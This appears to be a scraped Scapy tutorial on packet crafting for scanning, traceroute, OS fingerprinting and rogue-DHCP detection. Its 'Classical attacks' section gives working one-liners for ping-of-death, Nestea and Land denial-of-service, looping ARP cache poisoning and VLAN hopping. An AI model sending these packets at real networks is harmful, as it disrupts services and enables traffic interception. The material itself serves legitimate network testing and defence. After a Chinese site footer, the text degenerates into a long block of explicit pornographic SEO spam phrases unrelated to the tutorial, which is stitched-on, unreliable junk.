Scapy also includes a built-in arping() function which performs similar to the above two commands:

>>> arping("192.168.1.*")

ICMP Ping

Classical ICMP Ping can be emulated using the following command:

>>> ans,unans=sr(IP(dst="192.168.1.1-254")/ICMP())

Information on live hosts can be collected with the following request:

>>> ans.summary(lambda (s,r): r.sprintf("%IP.src% is alive") )

TCP Ping

In cases where ICMP echo requests are blocked, we can still use various TCP Pings such as TCP SYN Ping below:

>>> ans,unans=sr( IP(dst="192.168.1.*")/TCP(dport=80,flags="S") )

Any response to our probes will indicate a live host. We can collect results with the following command:

>>> ans.summary( lambda(s,r) : r.sprintf("%IP.src% is alive") )

UDP Ping

If all else fails there is always UDP Ping which will produce ICMP Port unreachable errors from live hosts. Here you can pick any port which is most likely to be closed, such as port 0:

>>> ans,unans=sr( IP(dst="192.168.*.1-10")/UDP(dport=0) )

Once again, results can be collected with this command:

>>> ans.summary( lambda(s,r) : r.sprintf("%IP.src% is alive") )

Classical attacks

Malformed packets:

>>> send(IP(dst="10.1.1.5", ihl=2, version=3)/ICMP())

Ping of death (Muuahahah):

>>> send( fragment(IP(dst="10.0.0.5")/ICMP()/("X"*60000)) )

Nestea attack:

>>> send(IP(dst=target, id=42, flags="MF")/UDP()/("X"*10))
>>> send(IP(dst=target, id=42, frag=48)/("X"*116))
>>> send(IP(dst=target, id=42, flags="MF")/UDP()/("X"*224))

Land attack (designed for Microsoft Windows):

>>> send(IP(src=target,dst=target)/TCP(sport=135,dport=135))

ARP cache poisoning

This attack prevents a client from joining the gateway by poisoning its ARP cache through a VLAN hopping attack.

Classic ARP cache poisoning:

>>> send( Ether(dst=clientMAC)/ARP(op="who-has", psrc=gateway, pdst=client),
????? inter=RandNum(10,40), loop=1 )

ARP cache poisoning with double 802.1q encapsulation:

>>> send( Ether(dst=clientMAC)/Dot1Q(vlan=1)/Dot1Q(vlan=2)
????? /ARP(op="who-has", psrc=gateway, pdst=client),
????? inter=RandNum(10,40), loop=1 )

TCP Port Scanning

Send a TCP SYN on each port. Wait for a SYN-ACK or a RST or an ICMP error:

>>> res,unans = sr( IP(dst="target")
??????????????? /TCP(flags="S", dport=(1,1024)) )

Possible result visualization: open ports

>>> res.nsummary( lfilter=lambda (s,r): (r.haslayer(TCP) and (r.getlayer(TCP).flags & 2)) )

IKE Scanning

We try to identify VPN concentrators by sending ISAKMP Security Association proposals and receiving the answers:

>>> res,unans = sr( IP(dst="192.168.1.*")/UDP()
??????????????? /ISAKMP(init_cookie=RandString(8), exch_type="identity prot.")
??????????????? /ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal())
????????????? )

Visualizing the results in a list:

>>> res.nsummary(prn=lambda (s,r): r.src, lfilter=lambda (s,r): r.haslayer(ISAKMP) )

Advanced traceroute

TCP SYN traceroute

>>> ans,unans=sr(IP(dst="4.2.2.1",ttl=(1,10))/TCP(dport=53,flags="S"))

Results would be:

>>> ans.summary( lambda(s,r) : r.sprintf("%IP.src%\t{ICMP:%ICMP.type%}\t{TCP:%TCP.flags%}"))
192.168.1.1???? time-exceeded
68.86.90.162??? time-exceeded
4.79.43.134???? time-exceeded
4.79.43.133???? time-exceeded
4.68.18.126???? time-exceeded
4.68.123.38???? time-exceeded
4.2.2.1???????? SA

UDP traceroute

Tracerouting an UDP application like we do with TCP is not reliable, because there’s no handshake. We need to give an applicative payload (DNS, ISAKMP, NTP, etc.) to deserve an answer:

>>> res,unans = sr(IP(dst="target", ttl=(1,20))
????????????? /UDP()/DNS(qd=DNSQR(qname="test.com"))

We can visualize the results as a list of routers:

>>> res.make_table(lambda (s,r): (s.dst, s.ttl, r.src))

DNS traceroute

We can perform a DNS traceroute by specifying a complete packet in?l4?parameter of?traceroute()?function:

>>> ans,unans=traceroute("4.2.2.1",l4=UDP(sport=RandShort())/DNS(qd=DNSQR(qname="thesprawl.org")))
Begin emission:
..*....******...******.***...****Finished to send 30 packets.
*****...***...............................
Received 75 packets, got 28 answers, remaining 2 packets
?? 4.2.2.1:udp53
1? 192.168.1.1???? 11
4? 68.86.90.162??? 11
5? 4.79.43.134???? 11
6? 4.79.43.133???? 11
7? 4.68.18.62????? 11
8? 4.68.123.6????? 11
9? 4.2.2.1
...

Etherleaking

>>> sr1(IP(dst="172.16.1.232")/ICMP())
<IP src=172.16.1.232 proto=1 [...] |<ICMP code=0 type=0 [...]|
<Padding load=’0O\x02\x01\x00\x04\x06public\xa2B\x02\x02\x1e’ |>>>

ICMP leaking

This was a Linux 2.0 bug:

>>> sr1(IP(dst="172.16.1.1", options="\x02")/ICMP())
<IP src=172.16.1.1 [...] |<ICMP code=0 type=12 [...] |
<IPerror src=172.16.1.24 options=’\x02\x00\x00\x00’ [...] |
<ICMPerror code=0 type=8 id=0x0 seq=0x0 chksum=0xf7ff |
<Padding load=’\x00[...]\x00\x1d.\x00V\x1f\xaf\xd9\xd4;\xca’ |>>>>>

VLAN hopping

In very specific conditions, a double 802.1q encapsulation will make a packet jump to another VLAN:

>>> sendp(Ether()/Dot1Q(vlan=2)/Dot1Q(vlan=7)/IP(dst=target)/ICMP())

Wireless sniffing

The following command will display information similar to most wireless sniffers:

>>> sniff(iface="ath0",prn=lambda x:x.sprintf("{Dot11Beacon:%Dot11.addr3%\t%Dot11Beacon.info%\t%PrismHeader.channel%\tDot11Beacon.cap%}"))

The above command will produce output similar to the one below:

00:00:00:01:02:03 netgear????? 6L?? ESS+privacy+PBCC
11:22:33:44:55:66 wireless_100 6L?? short-slot+ESS+privacy
44:55:66:00:11:22 linksys????? 6L?? short-slot+ESS+privacy
12:34:56:78:90:12 NETGEAR????? 6L?? short-slot+ESS+privacy+short-preamble

Recipes

Simplistic ARP Monitor

This program uses the?sniff()?callback (paramter prn). The store parameter is set to 0 so that the?sniff()?function will not store anything (as it would do otherwise) and thus can run forever. The filter parameter is used for better performances on high load : the filter is applied inside the kernel and Scapy will only see ARP traffic.

#! /usr/bin/env python
from scapy.all import *

def?arp_monitor_callback(pkt):
????if?ARP?in?pkt?and?pkt[ARP].op?in?(1,2):?#who-has or is-at
????????return?pkt.sprintf("%ARP.hwsrc% %ARP.psrc%")

sniff(prn=arp_monitor_callback,?filter="arp", store=0)

Identifying rogue DHCP servers on your LAN

Problem

You suspect that someone has installed an additional, unauthorized DHCP server on your LAN – either unintentiously or maliciously. Thus you want to check for any active DHCP servers and identify their IP and MAC addresses.

Solution

Use Scapy to send a DHCP discover request and analyze the replies:

>>> conf.checkIPaddr = False
>>> fam,hw = get_if_raw_hwaddr(conf.iface)
>>> dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[("message-type","discover"),"end"])
>>> ans, unans = srp(dhcp_discover, multi=True)????? # Press CTRL-C after several seconds
Begin emission:
Finished to send 1 packets.
.*...*..
Received 8 packets, got 2 answers, remaining 0 packets

In this case we got 2 replies, so there were two active DHCP servers on the test network:

>>> ans.summarize()
Ether / IP / UDP 0.0.0.0:bootpc > 255.255.255.255:bootps / BOOTP / DHCP ==> Ether / IP / UDP 192.168.1.1:bootps > 255.255.255.255:bootpc / BOOTP / DHCP
Ether / IP / UDP 0.0.0.0:bootpc > 255.255.255.255:bootps / BOOTP / DHCP ==> Ether / IP / UDP 192.168.1.11:bootps > 255.255.255.255:bootpc / BOOTP / DHCP
}}}
We are only interested in the MAC and IP addresses of the replies:
{{{
>>> for p in ans: print p[1][Ether].src, p[1][IP].src
...
00:de:ad:be:ef:00 192.168.1.1
00:11:11:22:22:33 192.168.1.11

Discussion

We specify?multi=True?to make Scapy wait for more answer packets after the first response is received. This is also the reason why we can’t use the more convenient?dhcp_request()?function and have to construct the DCHP packet manually:?dhcp_request()?uses?srp1()?for sending and receiving and thus would immediately return after the first answer packet.

Moreover, Scapy normally makes sure that replies come from the same IP address the stimulus was sent to. But our DHCP packet is sent to the IP broadcast address (255.255.255.255) and any answer packet will have the IP address of the replying DHCP server as its source IP address (e.g. 192.168.1.1). Because these IP addresses don’t match, we have to disable Scapy’s check with?conf.checkIPaddr?=?False?before sending the stimulus.

See also

http://en.wikipedia.org/wiki/Rogue_DHCP

Firewalking

TTL decrementation after a filtering operation only not filtered packets generate an ICMP TTL exceeded

>>> ans, unans = sr(IP(dst="172.16.4.27", ttl=16)/TCP(dport=(1,1024)))
>>> for s,r in ans:
??????? if r.haslayer(ICMP) and r.payload.type == 11:
??????????? print s.dport

Find subnets on a multi-NIC firewall only his own NIC’s IP are reachable with this TTL:

>>> ans, unans = sr(IP(dst="172.16.5/24", ttl=15)/TCP())
>>> for i in unans: print i.dst

TCP Timestamp Filtering

Problem

Many firewalls include a rule to drop TCP packets that do not have TCP Timestamp option set which is a common occurrence in popular port scanners.

Solution

To allow Scapy to reach target destination additional options must be used:

>>> sr1(IP(dst="72.14.207.99")/TCP(dport=80,flags="S",options=[('Timestamp',(0,0))]))

Viewing packets with Wireshark

Problem

You have generated or sniffed some packets with Scapy and want to view them with?Wireshark, because of its advanced packet dissection abilities.

Solution

That’s what the?wireshark()?function is for:

>>> packets = Ether()/IP(dst=Net("google.com/30"))/ICMP()???? # first generate some packets
>>> wireshark(packets)??????????????????????????????????????? # show them with Wireshark

Wireshark will start in the background and show your packets.

Discussion

The?wireshark()?function generates a temporary pcap-file containing your packets, starts Wireshark in the background and makes it read the file on startup.

Please remember that Wireshark works with Layer 2 packets (usually called “frames”). So we had to add an?Ether()?header to our ICMP packets. Passing just IP packets (layer 3) to Wireshark will give strange results.

You can tell Scapy where to find the Wireshark executable by changing the?conf.prog.wireshark?configuration setting.

OS Fingerprinting

ISN

Scapy can be used to analyze ISN (Initial Sequence Number) increments to possibly discover vulnerable systems. First we will collect target responses by sending a number of SYN probes in a loop:

>>> ans,unans=srloop(IP(dst="192.168.1.1")/TCP(dport=80,flags="S"))

Once we obtain a reasonable number of responses we can start analyzing collected data with something like this:

>>> temp = 0
>>> for s,r in ans:
... ???temp = r[TCP].seq - temp
... ???print str(r[TCP].seq) + "\t+" + str(temp)
...
4278709328????? +4275758673
4279655607????? +3896934
4280642461????? +4276745527
4281648240????? +4902713
4282645099????? +4277742386
4283643696????? +5901310

nmap_fp

Nmap fingerprinting (the old “1st generation” one that was done by Nmap up to v4.20) is supported in Scapy. In Scapy v2 you have to load an extension module first:

>>> load_module("nmap")

If you have Nmap installed you can use it’s active os fingerprinting database with Scapy. Make sure that version 1 of signature database is located in the path specified by:

>>> conf.nmap_base

Then you can use the?nmap_fp()?function which implements same probes as in Nmap’s OS Detection engine:

>>> nmap_fp("192.168.1.1",oport=443,cport=1)
Begin emission:
.****..**Finished to send 8 packets.
*................................................
Received 58 packets, got 7 answers, remaining 1 packets
(1.0, ['Linux 2.4.0 - 2.5.20', 'Linux 2.4.19 w/grsecurity patch',
'Linux 2.4.20 - 2.4.22 w/grsecurity.org patch', 'Linux 2.4.22-ck2 (x86)
w/grsecurity.org and HZ=1000 patches', 'Linux 2.4.7 - 2.6.11'])

p0f

If you have p0f installed on your system, you can use it to guess OS name and version right from Scapy (only SYN database is used). First make sure that p0f database exists in the path specified by:

>>> conf.p0f_base

For example to guess OS from a single captured packet:

>>> sniff(prn=prnp0f)
192.168.1.100:54716 - Linux 2.6 (newer, 1) (up: 24 hrs)
? -> 74.125.19.104:www (distance 0)
<Sniffed: TCP:339 UDP:2 ICMP:0 Other:156>




總結(jié)

以上是生活随笔為你收集整理的交互式数据包处理程序 Scapy 用法的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。

亚洲国产精品毛片av不卡在线 | 亚洲 日韩 欧美 成人 在线观看 | 精品久久综合1区2区3区激情 | 欧美阿v高清资源不卡在线播放 | 婷婷综合久久中文字幕蜜桃三电影 | 又湿又紧又大又爽a视频国产 | 熟妇女人妻丰满少妇中文字幕 | 久久亚洲a片com人成 | 99久久精品无码一区二区毛片 | 久久亚洲a片com人成 | 日韩av无码一区二区三区不卡 | 亚洲 激情 小说 另类 欧美 | 中文字幕色婷婷在线视频 | 影音先锋中文字幕无码 | 成 人 免费观看网站 | 少妇愉情理伦片bd | 国产精品无码mv在线观看 | 久久国产精品萌白酱免费 | 欧美zoozzooz性欧美 | 国产精品丝袜黑色高跟鞋 | 久久人人97超碰a片精品 | 乌克兰少妇xxxx做受 | 乱人伦人妻中文字幕无码久久网 | 一区二区三区高清视频一 | 久久久久久九九精品久 | 色五月丁香五月综合五月 | 亚洲s码欧洲m码国产av | 午夜性刺激在线视频免费 | 97夜夜澡人人爽人人喊中国片 | 久久99精品国产麻豆蜜芽 | 国产成人精品优优av | 色综合久久网 | 亚洲热妇无码av在线播放 | av小次郎收藏 | 性开放的女人aaa片 | 国产精品二区一区二区aⅴ污介绍 | 国产精品无码成人午夜电影 | 久久久久久久久888 | 国产精品第一区揄拍无码 | 国产成人无码区免费内射一片色欲 | 天堂а√在线中文在线 | 色偷偷人人澡人人爽人人模 | 亚洲娇小与黑人巨大交 | 午夜精品一区二区三区的区别 | 秋霞成人午夜鲁丝一区二区三区 | 76少妇精品导航 | 亚洲 激情 小说 另类 欧美 | 99在线 | 亚洲 | 欧美大屁股xxxxhd黑色 | 日日天日日夜日日摸 | 欧美激情内射喷水高潮 | 欧美日本日韩 | 国产av剧情md精品麻豆 | 丰满人妻翻云覆雨呻吟视频 | 婷婷色婷婷开心五月四房播播 | 久久99久久99精品中文字幕 | 欧美熟妇另类久久久久久多毛 | 丰满岳乱妇在线观看中字无码 | 亚洲爆乳精品无码一区二区三区 | 人人妻人人澡人人爽欧美一区 | 亚洲综合伊人久久大杳蕉 | 国产成人综合色在线观看网站 | 性欧美熟妇videofreesex | 樱花草在线社区www | 亚洲综合久久一区二区 | 国产精品久久久久久亚洲影视内衣 | 国产av一区二区三区最新精品 | 亚洲人成人无码网www国产 | 特级做a爰片毛片免费69 | 国产国产精品人在线视 | 伊人久久大香线焦av综合影院 | 久久国产精品精品国产色婷婷 | 国产在线一区二区三区四区五区 | 中文字幕无码av激情不卡 | 国语自产偷拍精品视频偷 | 国产成人人人97超碰超爽8 | 蜜臀av无码人妻精品 | 又湿又紧又大又爽a视频国产 | 999久久久国产精品消防器材 | 成熟女人特级毛片www免费 | 久久视频在线观看精品 | 亚洲а∨天堂久久精品2021 | 搡女人真爽免费视频大全 | 少妇激情av一区二区 | 极品嫩模高潮叫床 | 四十如虎的丰满熟妇啪啪 | 强开小婷嫩苞又嫩又紧视频 | 国产激情一区二区三区 | 久久久久免费精品国产 | 一本久道久久综合狠狠爱 | 一本色道久久综合亚洲精品不卡 | 久久久中文字幕日本无吗 | 乌克兰少妇xxxx做受 | 国产精品亚洲lv粉色 | 久久人妻内射无码一区三区 | 精品少妇爆乳无码av无码专区 | 日韩av无码一区二区三区 | 色综合久久久无码网中文 | 久久天天躁狠狠躁夜夜免费观看 | 久久久久亚洲精品男人的天堂 | 粗大的内捧猛烈进出视频 | 国内综合精品午夜久久资源 | 99国产精品白浆在线观看免费 | 亚洲成av人综合在线观看 | 久久精品国产一区二区三区 | 欧美怡红院免费全部视频 | 亚洲欧美国产精品专区久久 | 蜜桃臀无码内射一区二区三区 | 久久99精品久久久久久动态图 | 国产精华av午夜在线观看 | 欧美日本免费一区二区三区 | 乱码午夜-极国产极内射 | 装睡被陌生人摸出水好爽 | 久久97精品久久久久久久不卡 | 国产精品免费大片 | 久久人人爽人人爽人人片av高清 | 夫妻免费无码v看片 | 国产极品视觉盛宴 | 日产精品99久久久久久 | 人妻无码αv中文字幕久久琪琪布 | 午夜时刻免费入口 | 国产激情艳情在线看视频 | 巨爆乳无码视频在线观看 | 国产明星裸体无码xxxx视频 | 精品欧美一区二区三区久久久 | 无码精品国产va在线观看dvd | 无码人妻出轨黑人中文字幕 | 日韩人妻少妇一区二区三区 | 乱码午夜-极国产极内射 | 一本无码人妻在中文字幕免费 | 一本久道久久综合婷婷五月 | 内射欧美老妇wbb | 欧美性猛交xxxx富婆 | 精品一二三区久久aaa片 | 国产精品视频免费播放 | 亚洲欧美中文字幕5发布 | 亚洲精品鲁一鲁一区二区三区 | 国产精品无码成人午夜电影 | 日本爽爽爽爽爽爽在线观看免 | 国产熟妇高潮叫床视频播放 | 欧美人与牲动交xxxx | 色诱久久久久综合网ywww | 人妻aⅴ无码一区二区三区 | 国产特级毛片aaaaaaa高清 | 青草视频在线播放 | 特黄特色大片免费播放器图片 | 高潮毛片无遮挡高清免费 | 少妇人妻av毛片在线看 | 日韩精品无码免费一区二区三区 | 国产一区二区三区影院 | 无码人妻丰满熟妇区五十路百度 | 中文字幕无线码 | 亚洲综合在线一区二区三区 | 曰韩无码二三区中文字幕 | 国产亲子乱弄免费视频 | 精品国产av色一区二区深夜久久 | 国产女主播喷水视频在线观看 | 亚洲最大成人网站 | 无码帝国www无码专区色综合 | 伊人久久大香线蕉av一区二区 | 久久精品国产99精品亚洲 | 三级4级全黄60分钟 | 在线欧美精品一区二区三区 | 中文精品久久久久人妻不卡 | 波多野结衣一区二区三区av免费 | 亚洲熟女一区二区三区 | 欧美成人午夜精品久久久 | 国产精品无码mv在线观看 | 天堂一区人妻无码 | 任你躁在线精品免费 | 国产色视频一区二区三区 | 国产做国产爱免费视频 | 成人片黄网站色大片免费观看 | 99精品视频在线观看免费 | 亚洲一区二区三区香蕉 | 精品成人av一区二区三区 | 久久久av男人的天堂 | 精品欧洲av无码一区二区三区 | 色偷偷人人澡人人爽人人模 | 色婷婷欧美在线播放内射 | 国产凸凹视频一区二区 | 久久久久99精品国产片 | 全黄性性激高免费视频 | 无套内谢的新婚少妇国语播放 | aⅴ在线视频男人的天堂 | 国产免费久久精品国产传媒 | 国产精品99爱免费视频 | 亚洲理论电影在线观看 | 精品国产青草久久久久福利 | 夜夜躁日日躁狠狠久久av | 国产偷国产偷精品高清尤物 | 欧美色就是色 | 亚洲精品国偷拍自产在线观看蜜桃 | 乱人伦中文视频在线观看 | 在线天堂新版最新版在线8 | 最近的中文字幕在线看视频 | 丝袜足控一区二区三区 | 一本久久a久久精品亚洲 | 美女黄网站人色视频免费国产 | 国产区女主播在线观看 | аⅴ资源天堂资源库在线 | 乱码午夜-极国产极内射 | 日本一区二区三区免费播放 | 亚洲精品一区二区三区大桥未久 | 日日碰狠狠丁香久燥 | 国产亚洲精品久久久久久大师 | 小鲜肉自慰网站xnxx | 亚洲经典千人经典日产 | 成人精品视频一区二区三区尤物 | 又大又紧又粉嫩18p少妇 | 激情内射日本一区二区三区 | 国产乱人伦app精品久久 国产在线无码精品电影网 国产国产精品人在线视 | 激情综合激情五月俺也去 | 亚洲精品国偷拍自产在线麻豆 | 日本熟妇浓毛 | 老子影院午夜精品无码 | 国产性猛交╳xxx乱大交 国产精品久久久久久无码 欧洲欧美人成视频在线 | 国产精品无码久久av | 精品无码成人片一区二区98 | 国产美女极度色诱视频www | 亚洲国产成人a精品不卡在线 | 精品水蜜桃久久久久久久 | 国产精品怡红院永久免费 | 牲交欧美兽交欧美 | 国产成人无码av在线影院 | 精品久久久无码人妻字幂 | 国产偷自视频区视频 | 久久综合久久自在自线精品自 | 亚洲成色www久久网站 | 亚洲欧美国产精品专区久久 | 亚洲精品国产精品乱码不卡 | 中文字幕日韩精品一区二区三区 | 久久精品国产亚洲精品 | 超碰97人人射妻 | 99精品久久毛片a片 | 中文字幕av日韩精品一区二区 | 99久久99久久免费精品蜜桃 | 亚洲色无码一区二区三区 | 精品乱子伦一区二区三区 | 国产激情综合五月久久 | 丰满妇女强制高潮18xxxx | 国产午夜精品一区二区三区嫩草 | 图片区 小说区 区 亚洲五月 | 特级做a爰片毛片免费69 | 国产在热线精品视频 | 国内精品一区二区三区不卡 | 国产精品福利视频导航 | 国产真人无遮挡作爱免费视频 | 国产片av国语在线观看 | 无码人妻出轨黑人中文字幕 | 免费国产成人高清在线观看网站 | 在线观看免费人成视频 | 国产成人精品必看 | 国产精品人人爽人人做我的可爱 | 人妻无码αv中文字幕久久琪琪布 | 亚洲成av人在线观看网址 | 久久久久久国产精品无码下载 | 日本肉体xxxx裸交 | 我要看www免费看插插视频 | 国产超碰人人爽人人做人人添 | 亚洲中文字幕成人无码 | 97人妻精品一区二区三区 | 巨爆乳无码视频在线观看 | 97夜夜澡人人双人人人喊 | 高清不卡一区二区三区 | 扒开双腿吃奶呻吟做受视频 | 欧美阿v高清资源不卡在线播放 | 人人爽人人澡人人高潮 | 草草网站影院白丝内射 | 久9re热视频这里只有精品 | 水蜜桃亚洲一二三四在线 | 天天摸天天透天天添 | 午夜精品久久久内射近拍高清 | 青青草原综合久久大伊人精品 | 国产精品欧美成人 | 久久精品一区二区三区四区 | 2020久久香蕉国产线看观看 | 国产精品久久久 | 久久国语露脸国产精品电影 | 日本精品人妻无码免费大全 | 日韩 欧美 动漫 国产 制服 | 亚洲午夜久久久影院 | 国产精品手机免费 | 丰腴饱满的极品熟妇 | 日韩欧美中文字幕公布 | 日本一卡2卡3卡4卡无卡免费网站 国产一区二区三区影院 | 男人的天堂2018无码 | 无码国产激情在线观看 | 午夜福利试看120秒体验区 | 丝袜 中出 制服 人妻 美腿 | 欧美丰满熟妇xxxx性ppx人交 | 98国产精品综合一区二区三区 | 国产高清不卡无码视频 | 国产成人综合在线女婷五月99播放 | 日韩无套无码精品 | 一本大道伊人av久久综合 | 日韩精品无码一本二本三本色 | аⅴ资源天堂资源库在线 | 亚洲精品综合五月久久小说 | 三上悠亚人妻中文字幕在线 | 东京热一精品无码av | 亚洲午夜福利在线观看 | 人妻aⅴ无码一区二区三区 | 人妻无码αv中文字幕久久琪琪布 | 午夜无码区在线观看 | 好屌草这里只有精品 | 精品国产av色一区二区深夜久久 | 国产激情艳情在线看视频 | 亚洲精品成a人在线观看 | 领导边摸边吃奶边做爽在线观看 | 99久久精品午夜一区二区 | 国产色在线 | 国产 | 宝宝好涨水快流出来免费视频 | 久久精品国产99精品亚洲 | 永久黄网站色视频免费直播 | 久久久国产一区二区三区 | 国产精品无套呻吟在线 | 日本丰满护士爆乳xxxx | 澳门永久av免费网站 | 麻豆国产丝袜白领秘书在线观看 | 天海翼激烈高潮到腰振不止 | 麻豆国产丝袜白领秘书在线观看 | 亚洲中文字幕无码中文字在线 | 国产尤物精品视频 | 日本一卡2卡3卡4卡无卡免费网站 国产一区二区三区影院 | 午夜福利电影 | 中文字幕人妻无码一区二区三区 | 国产精品99久久精品爆乳 | 国语精品一区二区三区 | 99精品国产综合久久久久五月天 | 成在人线av无码免费 | 国产高清不卡无码视频 | 国产一区二区三区影院 | 久久久久亚洲精品中文字幕 | 国产亚洲人成在线播放 | 老司机亚洲精品影院无码 | 无套内谢的新婚少妇国语播放 | 熟妇人妻激情偷爽文 | 色综合视频一区二区三区 | 丰腴饱满的极品熟妇 | 亚洲一区二区三区无码久久 | 国产特级毛片aaaaaaa高清 | 国产在线精品一区二区高清不卡 | 伊人久久婷婷五月综合97色 | 日韩欧美成人免费观看 | 人人澡人人透人人爽 | 99久久久无码国产精品免费 | 任你躁国产自任一区二区三区 | 欧美精品一区二区精品久久 | 亚洲阿v天堂在线 | 免费人成网站视频在线观看 | 精品久久久无码中文字幕 | 东京无码熟妇人妻av在线网址 | 亚洲色无码一区二区三区 | 婷婷丁香五月天综合东京热 | 欧美日韩在线亚洲综合国产人 | 激情爆乳一区二区三区 | а天堂中文在线官网 | www国产亚洲精品久久网站 | 大乳丰满人妻中文字幕日本 | 久久综合给久久狠狠97色 | 国产人妻精品一区二区三区 | 好屌草这里只有精品 | 欧美日本精品一区二区三区 | 久久无码中文字幕免费影院蜜桃 | 东京热一精品无码av | 亚洲日韩av一区二区三区四区 | 久久精品女人的天堂av | 福利一区二区三区视频在线观看 | 国产激情无码一区二区app | 自拍偷自拍亚洲精品被多人伦好爽 | 天堂久久天堂av色综合 | 亚洲一区二区三区国产精华液 | 亚洲国产精品久久久天堂 | 亚洲爆乳精品无码一区二区三区 | 色婷婷av一区二区三区之红樱桃 | 日韩 欧美 动漫 国产 制服 | a片在线免费观看 | 亚洲日韩av一区二区三区中文 | 国产免费观看黄av片 | 男女猛烈xx00免费视频试看 | 国产精品高潮呻吟av久久 | 国产人妖乱国产精品人妖 | 国产黑色丝袜在线播放 | 成人欧美一区二区三区黑人免费 | 内射后入在线观看一区 | 一个人看的视频www在线 | 久久久久久久久蜜桃 | www国产亚洲精品久久久日本 | 好爽又高潮了毛片免费下载 | 久久久av男人的天堂 | 亚洲天堂2017无码 | 欧美亚洲国产一区二区三区 | 亚洲一区二区三区香蕉 | √天堂资源地址中文在线 | 无码午夜成人1000部免费视频 | 奇米影视888欧美在线观看 | 性生交大片免费看女人按摩摩 | 人妻插b视频一区二区三区 | 3d动漫精品啪啪一区二区中 | 丁香啪啪综合成人亚洲 | 欧美一区二区三区视频在线观看 | 国产在线精品一区二区三区直播 | 无码吃奶揉捏奶头高潮视频 | 97夜夜澡人人爽人人喊中国片 | 小sao货水好多真紧h无码视频 | 亚洲欧美日韩综合久久久 | 精品久久久久香蕉网 | 亚洲s色大片在线观看 | 久久久久久久女国产乱让韩 | 欧美丰满少妇xxxx性 | 国精产品一区二区三区 | av无码电影一区二区三区 | 久久天天躁夜夜躁狠狠 | 麻豆国产人妻欲求不满谁演的 | 一本色道婷婷久久欧美 | 日韩人妻无码中文字幕视频 | 色综合视频一区二区三区 | 丁香啪啪综合成人亚洲 | 欧美丰满熟妇xxxx性ppx人交 | 人人妻人人藻人人爽欧美一区 | 一本久久a久久精品vr综合 | 亚洲日本在线电影 | 日韩人妻系列无码专区 | 99久久婷婷国产综合精品青草免费 | 久久精品人人做人人综合试看 | 国产亚洲精品久久久久久大师 | 乱人伦人妻中文字幕无码 | 丝袜足控一区二区三区 | 久激情内射婷内射蜜桃人妖 | 牛和人交xxxx欧美 | 色综合久久中文娱乐网 | 亚洲 a v无 码免 费 成 人 a v | 国产午夜亚洲精品不卡 | 色综合久久中文娱乐网 | 色婷婷综合激情综在线播放 | 性色欲网站人妻丰满中文久久不卡 | 国产乱码精品一品二品 | 亚洲日韩精品欧美一区二区 | 亚洲国产精品无码一区二区三区 | 亚洲色在线无码国产精品不卡 | 一本久久a久久精品亚洲 | 中文字幕日韩精品一区二区三区 | 亚洲 a v无 码免 费 成 人 a v | 巨爆乳无码视频在线观看 | 久久无码人妻影院 | 亚洲国产综合无码一区 | 中文无码精品a∨在线观看不卡 | 欧美性猛交xxxx富婆 | 精品国产一区二区三区四区 | a片在线免费观看 | 国产精品无码成人午夜电影 | 成人欧美一区二区三区黑人免费 | 精品久久久久久人妻无码中文字幕 | 麻豆国产人妻欲求不满 | 女人高潮内射99精品 | av无码不卡在线观看免费 | 88国产精品欧美一区二区三区 | 久久国产精品萌白酱免费 | 狠狠色噜噜狠狠狠狠7777米奇 | 97久久精品无码一区二区 | 欧美亚洲国产一区二区三区 | 奇米影视888欧美在线观看 | 国产精品理论片在线观看 | 无码毛片视频一区二区本码 | 六十路熟妇乱子伦 | 久久www免费人成人片 | 日韩av无码中文无码电影 | 漂亮人妻洗澡被公强 日日躁 | 性欧美牲交在线视频 | 国产精品久免费的黄网站 | 久热国产vs视频在线观看 | 亚洲欧美日韩成人高清在线一区 | 高中生自慰www网站 | 亚洲国产高清在线观看视频 | 国产又爽又猛又粗的视频a片 | 久久aⅴ免费观看 | 成人欧美一区二区三区黑人 | 国内少妇偷人精品视频免费 | 国产精品久久国产三级国 | 中文字幕人妻无码一区二区三区 | 无码av免费一区二区三区试看 | 曰韩无码二三区中文字幕 | 2019nv天堂香蕉在线观看 | 亚洲精品一区二区三区四区五区 | 免费国产黄网站在线观看 | 日韩欧美中文字幕公布 | 狂野欧美激情性xxxx | 亚洲国产午夜精品理论片 | 国产人妻精品午夜福利免费 | 亚洲人成影院在线无码按摩店 | 无遮挡啪啪摇乳动态图 | 国产乱人伦app精品久久 国产在线无码精品电影网 国产国产精品人在线视 | 日本一区二区更新不卡 | 亚洲国产成人a精品不卡在线 | 国产高清不卡无码视频 | 人妻少妇精品无码专区动漫 | 亚拍精品一区二区三区探花 | 日韩少妇内射免费播放 | 精品成人av一区二区三区 | 久久久www成人免费毛片 | 亚洲欧美精品伊人久久 | 日韩人妻无码中文字幕视频 | 成人免费视频视频在线观看 免费 | 永久黄网站色视频免费直播 | 97久久超碰中文字幕 | 国产精品久久久久久无码 | 国产精品亚洲а∨无码播放麻豆 | 黑人玩弄人妻中文在线 | 水蜜桃色314在线观看 | 国产精品爱久久久久久久 | 欧美日本免费一区二区三区 | 日本一区二区三区免费高清 | 男女猛烈xx00免费视频试看 | 欧美真人作爱免费视频 | 乱码av麻豆丝袜熟女系列 | 日日摸天天摸爽爽狠狠97 | 国产人妻人伦精品1国产丝袜 | 久久久av男人的天堂 | 国产欧美熟妇另类久久久 | 亚洲自偷精品视频自拍 | 国产suv精品一区二区五 | 巨爆乳无码视频在线观看 | 欧美freesex黑人又粗又大 | 国产人妻精品一区二区三区 | 久久天天躁夜夜躁狠狠 | 亚洲人成影院在线观看 | 中文字幕+乱码+中文字幕一区 | 内射后入在线观看一区 | 亚洲精品无码人妻无码 | 牲欲强的熟妇农村老妇女 | 在线观看国产一区二区三区 | 国产手机在线αⅴ片无码观看 | 午夜成人1000部免费视频 | 欧美丰满熟妇xxxx性ppx人交 | 亚洲天堂2017无码 | 久久天天躁狠狠躁夜夜免费观看 | 成人av无码一区二区三区 | 国产xxx69麻豆国语对白 | 大屁股大乳丰满人妻 | 无码人妻精品一区二区三区下载 | 四虎影视成人永久免费观看视频 | 国产熟妇另类久久久久 | 白嫩日本少妇做爰 | 正在播放东北夫妻内射 | 麻豆蜜桃av蜜臀av色欲av | 午夜性刺激在线视频免费 | 